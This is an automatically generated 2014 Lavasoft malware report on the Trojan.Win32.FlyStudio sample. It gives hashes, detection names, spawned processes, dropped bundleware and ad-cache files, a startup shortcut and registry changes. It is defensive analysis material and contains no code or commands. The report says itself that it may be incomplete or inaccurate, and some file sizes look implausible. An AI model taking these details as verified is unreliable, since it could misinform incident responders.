Trojan.Win32.FlyStudio_4937d0d8c1

by malwarelabrobot on June 15th, 2014 in Malware Descriptions.

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Agent.BDJT (B) (Emsisoft), Trojan.Agent.BDJT (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.



MD5: 4937d0d8c199fab565657944560f67d1
SHA1: 5737a160ebc28f0bf83d2c4fa4accc59893a551c
SHA256: af3654e6a7ce82418e14b8d42487da9c09329eca7c5cf022bbcfa1e89f7967fb
SSDeep: 12288:M8cXSrqphitkdebZlqe8a 4pQGZjLfPtaXQsFhKF:M8cXSMit1bCQrjTlaA
Size: 494592 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-07 06:12:39
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Wuji.exe:568
FhCalendar.exe:452
wujiime.exe:464
MSIB.tmp:916
xxdd_165.exe:452
updroots.exe:1016
114gglm_016.exe:488
Update.exe:444
fhrl_6_12001.exe:320
fhsli_6_12001.exe:1852
netsh.exe:436
netsh.exe:628
SportLive.exe:908
MsiExec.exe:1760
oemfhsli.exe:628

The Trojan injects its code into the following process(es):

FhCalendar.exe:588
%original file name%.exe:1832

File activity

The process FhCalendar.exe:588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\fixad[1].htm (1737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].css (584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\sogou_icon_short[1].png (1421 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\qi[1].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].js (908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\82ea18df-b4ae-4b17-b1ab-46cba4b98343[1].jpg (19946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAH4OJPH.htm (2844 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\pixel[1].htm (6 bytes)
%Program Files%\fhrl\note.ini (991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\CAQJWRVK.htm (1684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\924aed3e-a026-4cc3-996e-72927d75dda5[1].jpg (7278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\jquery-1.3.2.min[1].js (36827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[1].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[2].js (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[2].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAKPO1SZ.htm (3738 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\48aaf3d6-f95f-4921-8a68-2606aed69a12[1].jpg (13306 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)

The process wujiime.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Wuji\Wuji.exe (7209 bytes)
%Program Files%\Wuji\update.exe (7451 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\无极输入法.lnk (638 bytes)
%Program Files%\Wuji\Wuji.dat (1945 bytes)
%Program Files%\Wuji\uninst.exe (3685 bytes)
%Documents and Settings%\%current user%\Desktop\无极输入法.lnk (626 bytes)
%Program Files%\Wuji\Wuji.dll (2422 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (479 bytes)
%System%\catsrvuz.dll (53 bytes)
%Program Files%\Wuji\Show.dat (5 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Desktop\无极输入法.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssD.tmp (0 bytes)
%Program Files%\Wuji\Wuji.dll (0 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (0 bytes)

The process xxdd_165.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\xxdd\Liveconfig.ini (22 bytes)
%Program Files%\xxdd\xxdd.msi (146581 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (0 bytes)

The process 114gglm_016.exe:488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\wujiime.exe (2105 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (0 bytes)

The process Update.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (72 bytes)
%Program Files%\fhrl\Update.log (402 bytes)
%Program Files%\fhrl\fhUp\Update\version.ini (72 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (0 bytes)

The process fhrl_6_12001.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\fhrl\Skin\test\btn_push.png (263 bytes)
%Program Files%\fhrl\Skin\test\clock_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\菜单bk.png (1 bytes)
%Program Files%\fhrl\Skin\test\确认按钮2态.png (1 bytes)
%Program Files%\fhrl\Skin\test\劳动节.png (1 bytes)
%Program Files%\fhrl\Skin\test\closetip_hov.png (4 bytes)
%Program Files%\fhrl\Skin\test\xpopweb.xml (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xhlwnd.xml (2 bytes)
%Program Files%\fhrl\Skin\test\国庆节.png (508 bytes)
%Program Files%\fhrl\Skin\test\equal_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\city_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_hover.png (792 bytes)
%Program Files%\fhrl\Skin\test\finish_push.png (417 bytes)
%Program Files%\fhrl\Skin\test\mini_bk.png (14 bytes)
%Program Files%\fhrl\Skin\test\go_hov.png (2 bytes)
%Program Files%\fhrl\Fhuninstall.exe (9178 bytes)
%Program Files%\fhrl\Skin\test\教师节.png (545 bytes)
%Program Files%\fhrl\Skin\test\ca_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\七夕节.png (930 bytes)
%Program Files%\fhrl\Skin\test\go_nor.png (2 bytes)
%Program Files%\fhrl\FMTest.exe (14713 bytes)
%Program Files%\fhrl\huangli.xml (6456 bytes)
%Program Files%\fhrl\Skin\test\finish_hov.png (413 bytes)
%Program Files%\fhrl\Skin\test\shop_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\closetip_push.png (4 bytes)
%Program Files%\fhrl\Skin\test\input.png (3 bytes)
%Program Files%\fhrl\Skin\test\back_push.png (2 bytes)
%Program Files%\fhrl\Update.exe (17508 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_down.png (279 bytes)
%Program Files%\fhrl\KillProc.exe (4255 bytes)
%Program Files%\fhrl\Skin\test\calendar.png (7 bytes)
%Program Files%\fhrl\Skin\test\day_hov.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_uninstall.png (1392 bytes)
%Program Files%\fhrl\Skin\test\setting_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\clocknote_list_item.xml (3 bytes)
%Program Files%\fhrl\Skin\test\假.png (1 bytes)
%Program Files%\fhrl\Skin\test\edit_nor.png (431 bytes)
%Program Files%\fhrl\Skin\test\button_B_hover.png (613 bytes)
%Program Files%\fhrl\Skin\test\clock_nor.png (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\风和日历\风和日历.lnk (686 bytes)
%Program Files%\fhrl\uninst.exe (738 bytes)
%Program Files%\fhrl\Skin\test\中秋节.png (1 bytes)
%Program Files%\fhrl\Skin\test\shop_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\Combo_over.bmp (3 bytes)
%Program Files%\fhrl\Skin\test\xfhnotetip.xml (1 bytes)
%Program Files%\fhrl\FMDLL32.dll (14324 bytes)
%Program Files%\fhrl\Skin\test\look_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\menu.xml (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_process.png (3 bytes)
%Program Files%\fhrl\Skin\test\jia_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\Refresh_hover.png (1 bytes)
%Program Files%\fhrl\Skin\test\clock_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\tip_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\equal_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\除夕.png (1 bytes)
%Program Files%\fhrl\Skin\test\setting_hov.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_back.png (1 bytes)
%Program Files%\fhrl\Skin\warn.wav (314 bytes)
%Program Files%\fhrl\subdivis.db (4 bytes)
%Program Files%\fhrl\Skin\test\shop_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_show.png (3 bytes)
%Program Files%\fhrl\Update\version.ini (72 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_normal.png (1578 bytes)
%Program Files%\fhrl\Skin\test\xminiweb.xml (2 bytes)
%Program Files%\fhrl\Skin\test\js_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\clock_del_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\look_nor.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\index_1.png (2 bytes)
%Program Files%\fhrl\Skin\Default\foembin.exe (12158 bytes)
%Program Files%\fhrl\Skin\test\button_normal.png (676 bytes)
%Program Files%\fhrl\Skin\test\xiala_1.png (1 bytes)
%Program Files%\fhrl\Skin\test\元旦.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_hot.png (1228 bytes)
%Program Files%\fhrl\FhCalendar.exe (19232 bytes)
%Program Files%\fhrl\Skin\Default\Skin.ini (1 bytes)
%Program Files%\fhrl\Skin\test\圣诞节.png (873 bytes)
%Program Files%\fhrl\Skin\test\js_sel.png (1 bytes)
%Program Files%\fhrl\Skin\test\index.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_close_highlight.png (475 bytes)
%Program Files%\fhrl\Skin\test\ca_nor.png (2 bytes)
%Program Files%\fhrl\Skin\Default\unist_btn_next.png (1350 bytes)
%Program Files%\fhrl\Skin\test\感恩节.png (1 bytes)
%Program Files%\fhrl\Skin\test\鬼节.png (913 bytes)
%Program Files%\fhrl\Skin\test\假选中.PNG (3 bytes)
%Program Files%\fhrl\Skin\test\xbasicsetting.xml (4 bytes)
%Program Files%\fhrl\Skin\test\tip.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_hov.png (1 bytes)
%Program Files%\fhrl\FMDLL.dll (14673 bytes)
%Program Files%\fhrl\Skin\test\close_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xiala_3.png (1 bytes)
%Program Files%\fhrl\DuiLib_u.dll (10572 bytes)
%Program Files%\fhrl\Skin\test\day_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xfh.xml (1568 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\风和日历.lnk (692 bytes)
%Program Files%\fhrl\Skin\test\scrollbar.bmp (1568 bytes)
%Program Files%\fhrl\Skin\test\春节.png (1 bytes)
%Documents and Settings%\All Users\Desktop\风和日历.lnk (674 bytes)
%Program Files%\fhrl\Skin\test\dian.png (290 bytes)
%Program Files%\fhrl\Skin\test\clock_del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\back_nor.png (2 bytes)
%Program Files%\fhrl\Skin\test\S_22.png (1 bytes)
%Program Files%\fhrl\Skin\test\重阳节.png (2 bytes)
%Program Files%\fhrl\Skin\Default\Controls.ini (285 bytes)
%Program Files%\fhrl\Skin\Default\bin.ini (1 bytes)
%Program Files%\fhrl\Skin\test\端午节.png (1 bytes)
%Program Files%\fhrl\Skin\test\delapp1.png (1 bytes)
%Program Files%\fhrl\Skin\test\close_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\new_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\logo.png (4 bytes)
%Program Files%\fhrl\Skin\test\Festival.xml (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_pic_top.png (1568 bytes)
%Program Files%\fhrl\Skin\test\back_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\清明节.png (1 bytes)
%Program Files%\fhrl\Skin\test\js_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\equal_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\妇女节.png (1 bytes)
%Program Files%\fhrl\Skin\test\父亲节.png (846 bytes)
%Program Files%\fhrl\Skin\test\edit_push.png (432 bytes)
%Program Files%\fhrl\Skin\test\儿童节.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_down.png (784 bytes)
%Program Files%\fhrl\Skin\test\delapp.png (3 bytes)
%Program Files%\fhrl\Skin\test\clock_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_close_normal.png (1682 bytes)
%Program Files%\fhrl\Skin\test\愚人节.png (991 bytes)
%Program Files%\fhrl\Skin\test\go_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\lunar.png (2 bytes)
%Program Files%\fhrl\Skin\test\班选中.PNG (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\风和日历.lnk (686 bytes)
%Program Files%\fhrl\Skin\test\new_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\day_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\js_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\logo_16icon.png (3 bytes)
%Program Files%\fhrl\Skin\test\bg10.png (1568 bytes)
%Program Files%\fhrl\Skin\test\默认.png (1 bytes)
%Program Files%\fhrl\Skin\test\tip_content_bk.png (3 bytes)
%Program Files%\fhrl\Skin\Default\line.png (2 bytes)
%Program Files%\fhrl\Skin\test\scrollbar.png (1 bytes)
%Program Files%\fhrl\Skin\test\shop_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\city_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_B_pushed.png (605 bytes)
%Program Files%\fhrl\Skin\test\logo_mini.png (1 bytes)
%Program Files%\fhrl\Skin\test\app_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\menu_bk.png (3 bytes)
%Program Files%\fhrl\Skin\test\jia_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\元宵节.png (1 bytes)
%Program Files%\fhrl\Skin\test\scrollbar_o.png (1975 bytes)
%Program Files%\fhrl\Skin\test\jsq_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\平安夜.png (1 bytes)
%Program Files%\fhrl\Skin\test\finish_nor.png (425 bytes)
%Program Files%\fhrl\Skin\test\ca_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_res.png (3 bytes)
%Program Files%\fhrl\Skin\test\默认选中.png (2 bytes)
%Program Files%\fhrl\Skin\test\jintian3.png (3 bytes)
%Program Files%\fhrl\Skin\test\layerClo.png (1 bytes)
%Program Files%\fhrl\Skin\Default\btn_radio.png (1 bytes)
%Program Files%\fhrl\Skin\test\确认按钮常态.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_B_normal.png (474 bytes)
%Program Files%\fhrl\Skin\test\setting_push.png (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\风和日历\卸载风和日历.lnk (691 bytes)
%Program Files%\fhrl\Skin\test\clock_del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\chat_mid_bk.png (1308 bytes)
%Program Files%\fhrl\Skin\test\closetip_nor.png (4 bytes)
%Program Files%\fhrl\Skin\test\clock_note_setting.xml (8 bytes)
%Program Files%\fhrl\Skin\test\Refresh_pushed.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_cancel.png (890 bytes)
%Program Files%\fhrl\Skin\test\母亲节.png (1 bytes)
%Program Files%\fhrl\Skin\test\S_11.png (1 bytes)
%Program Files%\fhrl\Skin\test\look_hov.png (2 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_close.png (2 bytes)
%Program Files%\fhrl\Skin\test\bord_bk.png (3 bytes)
%Program Files%\fhrl\Skin\test\Combo_nor.bmp (3 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_highlight.png (1440 bytes)
%Program Files%\fhrl\Skin\test\btn_close_down.png (1098 bytes)
%Program Files%\fhrl\Skin\test\班.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\close_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\情人节.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_check.png (3 bytes)
%Program Files%\fhrl\Skin\test\edit_hov.png (429 bytes)
%Program Files%\fhrl\Skin\test\clock_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\光棍节.png (536 bytes)
%Program Files%\fhrl\Skin\test\Refresh_normal.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\xiala_2.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\jia_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\ca_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\new_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\weather_bk.png (15 bytes)
%Program Files%\fhrl\Skin\test\friend_list_item.xml (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp (0 bytes)

The process fhsli_6_12001.exe:1852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (10 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (996 bytes)
%Program Files%\Common Files\Install\fhrlsli\oemfhsli.exe (17882 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (0 bytes)

The process SportLive.exe:908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\lb[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\iau[1].htm (1 bytes)
%Program Files%\xxss.ini (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\core[1].php (800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\z_stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\ad_sport[1].jpg (12251 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\addetail[1].html (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\ad[1].htm (519 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
%Program Files%\TogouInputin\Togoupplib.dat (2095 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\jquery-1.9.1.min[1].js (55677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\type[1].js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\event[1].css (554 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\addetail[1].htm (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\center-titlebg[1].png (948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\event[1].htm (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\common[1].js (73 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (214 bytes)

The process %original file name%.exe:1832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\fhsli_6_12001.exe (1616 bytes)
C:\114gglm_016.exe (1664 bytes)
C:\xxdd_165.exe (30622 bytes)

The process oemfhsli.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
%Documents and Settings%\All Users\Documents\fhrl_6_12001.exe (13084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (997 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (38 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (997 bytes)
%Program Files%\fhrl\info.db (120 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (0 bytes)

Registry activity

The process Wuji.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCU\Software\VB and VBA Program Settings\fzl\2013]
"zc1" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\VB and VBA Program Settings\fzl\2013]
"zc4" = "1"
"zc5" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB C0 45 22 1E 9D 7B 43 9E B3 E3 26 49 49 C8 76"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

